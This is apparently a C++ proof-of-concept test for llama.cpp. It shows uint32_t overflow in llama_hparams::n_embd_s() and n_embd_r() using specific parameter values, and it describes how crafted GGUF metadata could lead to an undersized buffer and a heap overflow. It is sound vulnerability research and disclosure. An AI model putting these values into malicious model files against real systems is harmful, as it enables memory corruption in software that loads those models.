/**
 * Empirical proof: uint32_t integer overflow in llama_hparams::n_embd_s()
 * and llama_hparams::n_embd_r().
 *
 * Tests 1-4 directly instantiate llama_hparams from llama.cpp and call
 * n_embd_s() / n_embd_r() with overflow-inducing values, proving the overflow
 * occurs in the actual production code (not a simulation). Test 5 is the one
 * exception: it reproduces the allocation-site multiplication on local values.
 *
 * Build:
 *   cd llama.cpp
 *   g++ -std=c++17 -I src -I include -I ggml/include \
 *       ../gguf_poc/test_hparams_overflow.cpp src/llama-hparams.cpp \
 *       -o ../gguf_poc/test_hparams_overflow
 *
 * Run:
 *   ./test_hparams_overflow
 */

#include "llama-hparams.h"

#include <cstdint>
#include <cstdio>
#include <cstring>

// Prints the "Status" line for one test and reports whether the 32-bit value
// fell short of the 64-bit reference value.
//
// Every reference value used in this file exceeds UINT32_MAX, so with the
// inputs below a 32-bit result is always smaller; the "SAFE" branch only
// becomes reachable if the inputs are changed.
static bool report_status(uint64_t returned, uint64_t correct, const char * vulnerable_label) {
    const bool vulnerable = returned < correct;
    printf(" Status: %s\n\n", vulnerable ? vulnerable_label : "SAFE");
    return vulnerable;
}

// Prints the "OVERFLOW" line for tests that also report how many times too
// small the wrapped value is. The ratio is skipped when the wrapped value is
// zero, because the division would otherwise be undefined behaviour.
static void print_overflow_ratio(uint64_t correct, uint32_t wrapped) {
    if (wrapped != 0) {
        printf(" OVERFLOW: %llu -> %u (buffer is %llux too small!)\n",
               (unsigned long long) correct, wrapped,
               (unsigned long long) (correct / wrapped));
    } else {
        printf(" OVERFLOW: %llu -> %u\n", (unsigned long long) correct, wrapped);
    }
}

// Runs the five overflow checks, printing the inputs, the 32-bit result and
// the 64-bit reference value for each, followed by a summary.
// Always returns 0; the outcome is reported on stdout only.
int main() {
    const int n_checks    = 5;
    int       n_confirmed = 0;

    printf("================================================================\n");
    printf("EMPIRICAL PROOF: uint32_t overflow in llama_hparams::n_embd_s()\n");
    printf("================================================================\n\n");

    // --- Test 1: Mamba path (ssm_d_state * ssm_d_inner) ---
    {
        printf("--- Test 1: Mamba path (line 169: return ssm_d_state * ssm_d_inner) ---\n");

        llama_hparams hp = {};
        // NOTE(review): memset also clears any default member initializers and
        // is only well-defined if llama_hparams is trivially copyable --
        // confirm against llama-hparams.h.
        memset(&hp, 0, sizeof(hp));
        hp.n_layer = 1;

        // Set values that overflow when multiplied as uint32_t
        hp.ssm_d_state = 1073741825; // (2^30 + 1)
        hp.ssm_d_inner = 4;

        // Ensure we hit the Mamba path (wkv_head_size=0, n_embd_head_kda=0)
        hp.wkv_head_size   = 0;
        hp.n_embd_head_kda = 0;

        const uint32_t result = hp.n_embd_s();

        // Correct value in 64-bit: 1073741825 * 4 = 4,294,967,300
        const uint64_t correct = (uint64_t) hp.ssm_d_state * hp.ssm_d_inner;

        printf(" ssm_d_state = %u\n", hp.ssm_d_state);
        printf(" ssm_d_inner = %u\n", hp.ssm_d_inner);
        printf(" n_embd_s() returned: %u\n", result);
        printf(" Correct value: %llu\n", (unsigned long long) correct);
        print_overflow_ratio(correct, result);

        n_confirmed += report_status(result, correct, "VULNERABLE (overflow confirmed)") ? 1 : 0;
    }

    // --- Test 2: RWKV path (n_embd * wkv_head_size) ---
    {
        printf("--- Test 2: RWKV6 path (line 158: return n_embd * wkv_head_size) ---\n");

        llama_hparams hp = {};
        memset(&hp, 0, sizeof(hp)); // NOTE(review): see the memset note in Test 1
        hp.n_layer = 1;

        hp.n_embd        = 65537;
        hp.wkv_head_size = 65537;

        const uint32_t result  = hp.n_embd_s();
        const uint64_t correct = (uint64_t) hp.n_embd * hp.wkv_head_size;

        printf(" n_embd = %u\n", hp.n_embd);
        printf(" wkv_head_size = %u\n", hp.wkv_head_size);
        printf(" n_embd_s() returned: %u\n", result);
        printf(" Correct value: %llu\n", (unsigned long long) correct);
        print_overflow_ratio(correct, result);

        n_confirmed += report_status(result, correct, "VULNERABLE (overflow confirmed)") ? 1 : 0;
    }

    // --- Test 3: Kimi KDA path (n_embd_head_kda^2 * n_head) ---
    {
        printf("--- Test 3: Kimi KDA path (line 165: return n_embd_head_kda * n_embd_head_kda * n_head()) ---\n");

        llama_hparams hp = {};
        memset(&hp, 0, sizeof(hp)); // NOTE(review): see the memset note in Test 1
        hp.n_layer = 1;

        hp.wkv_head_size   = 0;
        hp.n_embd_head_kda = 65536; // 65536^2 = 2^32, wraps to 0

        // n_head() reads n_head_arr[0], must be set
        hp.n_head_arr[0] = 1;

        const uint32_t result  = hp.n_embd_s();
        const uint64_t correct = (uint64_t) hp.n_embd_head_kda * hp.n_embd_head_kda * hp.n_head_arr[0];

        printf(" n_embd_head_kda = %u\n", hp.n_embd_head_kda);
        printf(" n_head = %u\n", hp.n_head_arr[0]);
        printf(" n_embd_s() returned: %u\n", result);
        printf(" Correct value: %llu\n", (unsigned long long) correct);
        if (result == 0) {
            printf(" OVERFLOW: wraps to ZERO! ggml_new_tensor_1d allocates 0 bytes!\n");
        } else {
            printf(" OVERFLOW: %llu -> %u\n", (unsigned long long) correct, result);
        }

        n_confirmed += report_status(result, correct, "VULNERABLE (overflow confirmed)") ? 1 : 0;
    }

    // --- Test 4: n_embd_r() Mamba path ---
    {
        printf("--- Test 4: n_embd_r() Mamba path (line 152) ---\n");

        llama_hparams hp = {};
        memset(&hp, 0, sizeof(hp)); // NOTE(review): see the memset note in Test 1
        hp.n_layer = 1;

        hp.wkv_head_size       = 0;
        hp.n_shortconv_l_cache = 0;
        hp.n_embd_head_kda     = 0;
        hp.ssm_d_conv          = 4;
        hp.ssm_d_inner         = 4;
        hp.ssm_n_group         = 1;
        hp.ssm_d_state         = 715827883; // chosen so (d_conv-1)*(d_inner + 2*1*d_state) overflows

        const uint32_t result = hp.n_embd_r();

        // (4-1) * (4 + 2*1*715827883) = 3 * (4 + 1431655766) = 3 * 1431655770 = 4294967310
        const uint64_t sub     = (uint64_t) hp.ssm_d_inner + 2ULL * hp.ssm_n_group * hp.ssm_d_state;
        const uint64_t correct = ((uint64_t) hp.ssm_d_conv - 1) * sub;

        printf(" ssm_d_conv = %u\n", hp.ssm_d_conv);
        printf(" ssm_d_inner = %u\n", hp.ssm_d_inner);
        printf(" ssm_n_group = %u\n", hp.ssm_n_group);
        printf(" ssm_d_state = %u\n", hp.ssm_d_state);
        printf(" n_embd_r() returned: %u\n", result);
        printf(" Correct value: %llu\n", (unsigned long long) correct);

        n_confirmed += report_status(result, correct, "VULNERABLE (overflow confirmed)") ? 1 : 0;
    }

    // --- Test 5: Double overflow at allocation site ---
    // This one does not call into llama.cpp; it repeats the 32-bit
    // multiplication on local values to show the wrap-around.
    {
        printf("--- Test 5: Double overflow simulation (allocation site lines 94-95) ---\n");
        printf(" Code: hparams.n_embd_s() * mem_size\n");
        printf(" Both are uint32_t, multiplication overflows before widening to int64_t\n\n");

        const uint32_t n_embd_s_val = 65536; // legitimate n_embd_s() return value
        const uint32_t mem_size     = 65537; // batch/sequence size

        const uint32_t result  = n_embd_s_val * mem_size; // uint32_t * uint32_t
        const uint64_t correct = (uint64_t) n_embd_s_val * mem_size;

        printf(" n_embd_s() = %u\n", n_embd_s_val);
        printf(" mem_size = %u\n", mem_size);
        printf(" uint32 mul = %u\n", result);
        printf(" Correct mul = %llu\n", (unsigned long long) correct);

        n_confirmed += report_status(result, correct, "VULNERABLE (double overflow)") ? 1 : 0;
    }

    printf("================================================================\n");
    if (n_confirmed == n_checks) {
        printf("CONCLUSION: All overflow paths in n_embd_s()/n_embd_r() are\n");
        printf("confirmed vulnerable. An attacker crafting GGUF metadata with\n");
        printf("these values causes undersized buffer allocation in\n");
        printf("llama_memory_recurrent (lines 94-95), leading to heap overflow\n");
        printf("when recurrent state data is written during inference.\n");
    } else {
        // Do not claim a blanket result that the per-test lines contradict.
        printf("CONCLUSION: %d of %d overflow checks were confirmed; see the\n", n_confirmed, n_checks);
        printf("per-test Status lines above for the paths that reported SAFE.\n");
    }
    printf("================================================================\n");

    return 0;
}